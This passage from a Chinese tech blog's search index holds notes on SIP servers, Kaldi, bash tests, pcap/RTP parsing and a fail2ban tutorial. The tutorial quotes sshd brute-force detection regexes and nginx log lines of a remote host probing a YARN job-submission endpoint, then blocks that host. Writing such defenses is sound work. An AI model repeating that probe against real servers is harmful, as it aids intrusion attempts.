https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得也是kaimailio也是更胜一筹,至少kamailioo还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","permalink":"https://wdd.js.org/opensips/tools/kamailio/","summary":"之前我写过OpenSIPS的文章,所以在学习Kamailio是,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git start数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以不借助外部工具的情况下,写的非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得也是kaimailio也是更胜一筹,至少kamailioo还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","title":"另一个功能强大的sip server: kamailio"},{"content":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images. docker run -it --runtime=nvidia kaldiasr/kaldi:gpu-latest Please refer to Kaldi\u0026#39;s GitHub repository for more details. kaldiasr/kaldi这个镜像是基于linuxkit构建的,如果缺少什么包,可以使用apt命令在容器中安装\n安装oymyzsh 因为我比较喜欢用ohmyzsh, 所以即使在容器里,我也想安装这个工具\napt install zsh curl ","permalink":"https://wdd.js.org/posts/2020/05/haowe5/","summary":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images.","title":"kaldi安装"},{"content":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html\n","permalink":"https://wdd.js.org/posts/2020/05/uwe59t/","summary":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html","title":"Type 'Timeout' is not assignable to type 'number'"},{"content":"sudo killall -HUP mDNSResponder ","permalink":"https://wdd.js.org/posts/2020/05/gy02f8/","summary":"sudo killall -HUP mDNSResponder ","title":"macbook 清空DNS缓存"},{"content":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。\n[[ $str1 == $str2 ]] # 测试字符串是否相等 [[ $str1 != $str2 ]] # 测试字符串是否不相等 [[ $str1 \u0026gt; $str2 ]] # 测试str1字符序号比str2大 [[ $str1 \u0026lt; $str2 ]] # 测试str1字符序号比str2小 [[ -z $str ]] # 测试str是否是空字符串 [[ -n $str ]] # 测试str是否是非空字符串 if 和[之间必须包含有一个空格 # ok if [[ $1 == $2 ]]; then echo hello fi # error if[[ $1 == $2 ]]; then echo hello fi ","permalink":"https://wdd.js.org/shell/cond-test/","summary":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。","title":"比较与测试"},{"content":"","permalink":"https://wdd.js.org/posts/2020/05/db6ou6/","summary":"","title":"xmpp学习"},{"content":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之间虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pacp文件中成功提取出了语音文件。再次做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是paap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小段字节序来读取。 version_major 大版本号,16位无符号整形。一般是2 version_minor 小版本号,16位无符号整形。一般是4 thiszone 时区 sigfigs 实际时间戳 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.tcpdump.org/linktypes.html, 常见的1就是表示IEEE 802.3 Packet Header 当读取了pcap文件的前24个字节之后,紧接着需要读取16个字节。这16个字节中,incl_len表示packet数据部分的长度。当拿到了Packet Data部分数据的长度。我们同时也就知道了下一个packet header要从哪个位置开始读取。\ntypedef struct pcaprec_hdr_s { guint32 ts_sec; /* timestamp seconds */ guint32 ts_usec; /* timestamp microseconds */ guint32 incl_len; /* number of octets of packet saved in file */ guint32 orig_len; /* actual length of packet */ } pcaprec_hdr_t; Packet Data packet data部分是链路层的数据,由global header的network类型去决定,一般可能是802.3的比较多。\nIEEE 802.3 当拿到packet data部分的数据之后。参考frame的格式。一般Peramble字段部分是没有的。所以我们可以把包的总长度减去14字节之后,拿到User Data部分的数据。\n其中Type/Length部分可以说明上层运载的是什么协议的包,比较常见的是0x0800表示上层是IPv4, 0x86dd表示上层是IPv6\n0 - 1500 length field (IEEE 802.3 and/or 802.2) 0x0800 IP(v4), Internet Protocol version 4 0x0806 ARP, Address Resolution Protocol 0x8137 IPX, Internet Packet eXchange (Novell) 0x86dd IPv6, Internet Protocol version 6 802.3的详情可以参考 https://wiki.wireshark.org/Ethernet?action=show\u0026amp;redirect=Protocols%2Feth\nIP包的封装格式 如何计算IP数据部分的长度呢?需要知道两个字段的值。\nTotol Length: IP数据报的总长度,单位是字节 IHL: IP数据报头部的总长度,单位是4字节。IHL比较常见的值是5,则说命名IP数据头部的长度是20字节。IHL占4位,最大是15,所以IP头的最大长度是60字节(15 * 4) data部分的字节长度 = Total Length - IHL * 4\nTCP包的封装格式 UDP包的封装格式 UDP包的头部是定长的8个字节。数据部分的长度 = 总长度 - 8\nRTP包的封装格式 RTP包的数据部分长度 = 总长度 - 12\nPT部分表示编码格式,例如常见的PCMU是0,\nRTP详情 https://www.ietf.org/rfc/rfc3550.txtRTP数据体类型编码表参考 https://www.ietf.org/rfc/rfc3551.txt\n参考 http://www.tcpdump.org/linktypes.html https://wiki.wireshark.org/Development/LibpcapFileFormat ","permalink":"https://wdd.js.org/network/gzskun/","summary":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之间虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pacp文件中成功提取出了语音文件。再次做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是paap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小段字节序来读取。 version_major 大版本号,16位无符号整形。一般是2 version_minor 小版本号,16位无符号整形。一般是4 thiszone 时区 sigfigs 实际时间戳 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.","title":"网络拆包笔记"},{"content":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap\u0026#39; Force datalink header length: disabled + OUTPUT Output directory: \u0026#39;./\u0026#39; RTP raw dumps: enabled RTP pcap dumps: enabled Fill gaps: enabled Dump noise: disabled Logfile: \u0026#39;.//rtp.0.txt\u0026#39; Logging to stdout: enabled Logging to syslog: disabled Be verbose: disabled + SELECT Sniff packets in promisc mode: enabled Add pcap filter: disabled Expecting even destination UDP port: disabled Expecting unprivileged source/destination UDP ports: disabled Expecting RTP payload type: any Expecting RTP payload length: any Packet timeout: 10.00 seconds Pattern timeout: 0.25 seconds Pattern packets: 5 + EXECUTION Running as user/group: root/root Running daemonized: disabled * You can dump stats sending me a SIGUSR2 signal * Reading packets... open di .//rtp.0.0.txt ! [rtp0] detected: pt=0(g711U) 192.168.40.192:26396 =\u0026gt; 192.168.60.229:20000 open di .//rtp.0.1.txt ! [rtp1] detected: pt=0(g711U) 10.197.169.10:49265 =\u0026gt; 192.168.60.229:20012 * eof reached. -- Caught SIGTERM signal (15), cleaning up... -- * [rtp1] closed: packets inbuffer=0 flushed=285 lost=0(0.00%), call_length=0m12s * [rtp0] closed: packets inbuffer=0 flushed=586 lost=0(0.00%), call_length=0m12s + Status Alive RTP Sessions: 0 Closed RTP Sessions: 2 Detected RTP Sessions: 2 Flushed RTP packets: 871 Lost RTP packets: 0 (0.00%) Noise (false positive) packets: 8 + No active RTP streams # 7. 查看输出文件 -rw-r--r--. 1 root root 185K May 1 09:22 krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -rw-r--r--. 1 root root 132K May 1 09:49 rtp.0.0.pcap -rw-r--r--. 1 root root 92K May 1 09:49 rtp.0.0.raw -rw-r--r--. 1 root root 412 May 1 09:49 rtp.0.0.txt -rw-r--r--. 1 root root 52K May 1 09:49 rtp.0.1.pcap -rw-r--r--. 1 root root 33K May 1 09:49 rtp.0.1.raw -rw-r--r--. 1 root root 435 May 1 09:49 rtp.0.1.txt -rw-r--r--. 1 root root 1.7K May 1 09:49 rtp.0.txt # 8. 使用sox 转码以及合成wav文件 sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav sox -m 0.wav 1.wav call.wav # 最终合成的 call.wav文件,就是可以放到浏览器中播放的双声道语音文件 参考 rtpbreak帮助文档 Copyright (c) 2007-2008 Dallachiesa Michele \u0026lt;micheleDOTdallachiesaATposteDOTit\u0026gt; rtpbreak v1.3a is free software, covered by the GNU General Public License. USAGE: rtpbreak (-r|-i) \u0026lt;source\u0026gt; [options] INPUT -r \u0026lt;str\u0026gt; Read packets from pcap file \u0026lt;str\u0026gt; -i \u0026lt;str\u0026gt; Read packets from network interface \u0026lt;str\u0026gt; -L \u0026lt;int\u0026gt; Force datalink header length == \u0026lt;int\u0026gt; bytes OUTPUT -d \u0026lt;str\u0026gt; Set output directory to \u0026lt;str\u0026gt; (def:.) -w Disable RTP raw dumps -W Disable RTP pcap dumps -g Fill gaps in RTP raw dumps (caused by lost packets) -n Dump noise packets -f Disable stdout logging -F Enable syslog logging -v Be verbose SELECT -m Sniff packets in promisc mode -p \u0026lt;str\u0026gt; Add pcap filter \u0026lt;str\u0026gt; -e Expect even destination UDP port -u Expect unprivileged source/destination UDP ports (\u0026gt;1024) -y \u0026lt;int\u0026gt; Expect RTP payload type == \u0026lt;int\u0026gt; -l \u0026lt;int\u0026gt; Expect RTP payload length == \u0026lt;int\u0026gt; bytes -t \u0026lt;float\u0026gt; Set packet timeout to \u0026lt;float\u0026gt; seconds (def:10.00) -T \u0026lt;float\u0026gt; Set pattern timeout to \u0026lt;float\u0026gt; seconds (def:0.25) -P \u0026lt;int\u0026gt; Set pattern packets count to \u0026lt;int\u0026gt; (def:5) EXECUTION -Z \u0026lt;str\u0026gt; Run as user \u0026lt;str\u0026gt; -D Run in background (option -f implicit) MISC -k List known RTP payload types -h This ","permalink":"https://wdd.js.org/posts/2020/05/fosfbg/","summary":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.","title":"从pcap文件提取转wav语音文件"},{"content":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。\n","permalink":"https://wdd.js.org/posts/2020/04/uffptn/","summary":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。","title":"娱乐智障"},{"content":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client\n**fail2ban-client status **显示fail2ban的状态 **fail2ban-client status sshd **显示某个监狱的配置。从下文的输出来看可以看出来fail2ban已经拦截了一些IP地址了 \u0026gt; fail2ban-client status Status |- Number of jail:\t1 `- Jail list:\tsshd \u0026gt; fail2ban-client status sshd Status for the jail: sshd |- Filter | |- Currently failed:\t2 | |- Total failed:\t23289 | `- Journal matches:\t_SYSTEMD_UNIT=sshd.service + _COMM=sshd `- Actions |- Currently banned:\t9 |- Total banned:\t1270 `- Banned IP list:\t93.174.93.10 165.22.238.92 23.231.25.234 134.255.219.207 77.202.192.113 120.224.47.86 144.91.70.139 90.3.194.84 217.182.89.87 fail2ban保护sshd的原理 fail2ban的配置文件目录下有个filter.d目录,该目录下有个sshd.conf的文件,这个文件就是对于sshd日志的过滤规则,里面有些正常时用来提取出恶意家伙的IP地址。\n配置配置文件很长,我们只看其中一段, 其中**\u0026lt;****HOST\u0026gt;**是个非常重要的关键词,是用来提取出远程的IP地址的。\ncmnfailre = ^[aA]uthentication (?:failure|error|failed) for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;( via \\S+)?%(__suff)s$ ^User not known to the underlying authentication module for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__suff)s$ ^Failed publickey for invalid user \u0026lt;F-USER\u0026gt;(?P\u0026lt;cond_user\u0026gt;\\S+)|(?:(?! from ).)*?\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__on_port_opt)s(?: ssh\\d*)?(?(cond_us 实战:如何自定义一个过滤规则 我的nginx服务器,几乎每隔2-3秒就会收到下面的一个请求。\n下面我就写个过滤规则,将类似请求的IP加入黑名单。\n165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:22:48 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:24:08 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:25:45 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:28:01 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; step1: 分析日志规则 165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; HOST - - .*\u0026#34; 502 .* step2: 写规则文件 在filter.d目录下新建文件 banit.conf\n[INCLUDES] [Definition] failregex = \u0026lt;HOST\u0026gt; - - .*\u0026#34; 502 .* ignoreregex = step3: 修改jail.local [DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true [banit] enabled = true action = iptables-allports[name=banit, protocol=all] logpath = /var/log/nginx/access.log step4: 重启fail2ban fail2ban-client restart**\nstep5: 查看效果 可以看出banit的这个监狱,已经加入了一个165.22.225.238这个ip,这个流氓不会在骚扰我们的主机了。\n\u0026gt; fail2ban fail2ban-client status banit Status for the jail: banit |- Filter | |- Currently failed:\t1 | |- Total failed:\t5 | `- File list:\t/var/log/nginx/access.log `- Actions |- Currently banned:\t1 |- Total banned:\t1 `- Banned IP list:\t165.22.225.238 **\nfail2ban-client 常用操作 重启: **fail2ban systemctl restart fail2ban ** 查看fail2ban opensips运行状态: **fail2ban-client status opensips ** 黑名单操作 (注意,黑名单测试时,不要把自己的IP加到黑名单里做测试,否则就连不上机器了) IP加入黑名单:**fail2ban-client set opensips banip 192.168.1.8 ** IP解锁:fail2ban-client set opensips unbanip 192.168.1.8 白名单操作 IP加入白名单:fail2ban-client set opensips addignoreip 192.168.1.8 IP从白名单中移除:fail2ban-client set opensips delignoreip 192.168.1.8 在所有监狱中加入IP白名单:fail2ban-clien unban 192.168.1.8 fail2ban的拦截是基于jail, 如果一个ip在某个jail中,但是不在其他jail中,那么这个ip也是无法访问主机。如果想在所有jail中加入一个白名单,需要fail2ban-client unban ip。\n**\nfail2ban-client帮助文档 Usage: fail2ban-client [OPTIONS] \u0026lt;COMMAND\u0026gt; Fail2Ban v0.10.5 reads log file that contains password failure report and bans the corresponding IP addresses using firewall rules. Options: -c \u0026lt;DIR\u0026gt; configuration directory -s \u0026lt;FILE\u0026gt; socket path -p \u0026lt;FILE\u0026gt; pidfile path --loglevel \u0026lt;LEVEL\u0026gt; logging level --logtarget \u0026lt;TARGET\u0026gt; logging target, use file-name or stdout, stderr, syslog or sysout. --syslogsocket auto|\u0026lt;FILE\u0026gt; -d dump configuration. For debugging --dp, --dump-pretty dump the configuration using more human readable representation -t, --test test configuration (can be also specified with start parameters) -i interactive mode -v increase verbosity -q decrease verbosity -x force execution of the server (remove socket file) -b start server in background (default) -f start server in foreground --async start server in async mode (for internal usage only, don\u0026#39;t read configuration) --timeout timeout to wait for the server (for internal usage only, don\u0026#39;t read configuration) --str2sec \u0026lt;STRING\u0026gt; convert time abbreviation format to seconds -h, --help display this help message -V, --version print the version (-V returns machine-readable short format) Command: BASIC start starts the server and the jails restart restarts the server restart [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; restarts the jail \u0026lt;JAIL\u0026gt; (alias for \u0026#39;reload --restart ... \u0026lt;JAIL\u0026gt;\u0026#39;) reload [--restart] [--unban] [--all] reloads the configuration without restarting of the server, the option \u0026#39;--restart\u0026#39; activates completely restarting of affected jails, thereby can unban IP addresses (if option \u0026#39;--unban\u0026#39; specified) reload [--restart] [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; reloads the jail \u0026lt;JAIL\u0026gt;, or restarts it (if option \u0026#39;--restart\u0026#39; specified) stop stops all jails and terminate the server unban --all unbans all IP addresses (in all jails and database) unban \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; unbans \u0026lt;IP\u0026gt; (in all jails and database) status gets the current status of the server ping tests if the server is alive echo for internal usage, returns back and outputs a given string help return this output version return the server version LOGGING set loglevel \u0026lt;LEVEL\u0026gt; sets logging level to \u0026lt;LEVEL\u0026gt;. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG, TRACEDEBUG, HEAVYDEBUG or corresponding numeric value (50-5) get loglevel gets the logging level set logtarget \u0026lt;TARGET\u0026gt; sets logging target to \u0026lt;TARGET\u0026gt;. Can be STDOUT, STDERR, SYSLOG or a file get logtarget gets logging target set syslogsocket auto|\u0026lt;SOCKET\u0026gt; sets the syslog socket path to auto or \u0026lt;SOCKET\u0026gt;. Only used if logtarget is SYSLOG get syslogsocket gets syslog socket path flushlogs flushes the logtarget if a file and reopens it. For log rotation. DATABASE set dbfile \u0026lt;FILE\u0026gt; set the location of fail2ban persistent datastore. Set to \u0026#34;None\u0026#34; to disable get dbfile get the location of fail2ban persistent datastore set dbmaxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in database per ticket get dbmaxmatches gets the max number of matches stored in database per ticket set dbpurgeage \u0026lt;SECONDS\u0026gt; sets the max age in \u0026lt;SECONDS\u0026gt; that history of bans will be kept get dbpurgeage gets the max age in seconds that history of bans will be kept JAIL CONTROL add \u0026lt;JAIL\u0026gt; \u0026lt;BACKEND\u0026gt; creates \u0026lt;JAIL\u0026gt; using \u0026lt;BACKEND\u0026gt; start \u0026lt;JAIL\u0026gt; starts the jail \u0026lt;JAIL\u0026gt; stop \u0026lt;JAIL\u0026gt; stops the jail \u0026lt;JAIL\u0026gt;. The jail is removed status \u0026lt;JAIL\u0026gt; [FLAVOR] gets the current status of \u0026lt;JAIL\u0026gt;, with optional flavor or extended info JAIL CONFIGURATION set \u0026lt;JAIL\u0026gt; idle on|off sets the idle state of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignoreself true|false allows the ignoring of own IP addresses set \u0026lt;JAIL\u0026gt; addignoreip \u0026lt;IP\u0026gt; adds \u0026lt;IP\u0026gt; to the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreip \u0026lt;IP\u0026gt; removes \u0026lt;IP\u0026gt; from the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecommand \u0026lt;VALUE\u0026gt; sets ignorecommand of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecache \u0026lt;VALUE\u0026gt; sets ignorecache of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addlogpath \u0026lt;FILE\u0026gt; [\u0026#39;tail\u0026#39;] adds \u0026lt;FILE\u0026gt; to the monitoring list of \u0026lt;JAIL\u0026gt;, optionally starting at the \u0026#39;tail\u0026#39; of the file (default \u0026#39;head\u0026#39;). set \u0026lt;JAIL\u0026gt; dellogpath \u0026lt;FILE\u0026gt; removes \u0026lt;FILE\u0026gt; from the monitoring list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; logencoding \u0026lt;ENCODING\u0026gt; sets the \u0026lt;ENCODING\u0026gt; of the log files for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addjournalmatch \u0026lt;MATCH\u0026gt; adds \u0026lt;MATCH\u0026gt; to the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; deljournalmatch \u0026lt;MATCH\u0026gt; removes \u0026lt;MATCH\u0026gt; from the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addfailregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which must match failures for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delfailregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for failregex set \u0026lt;JAIL\u0026gt; 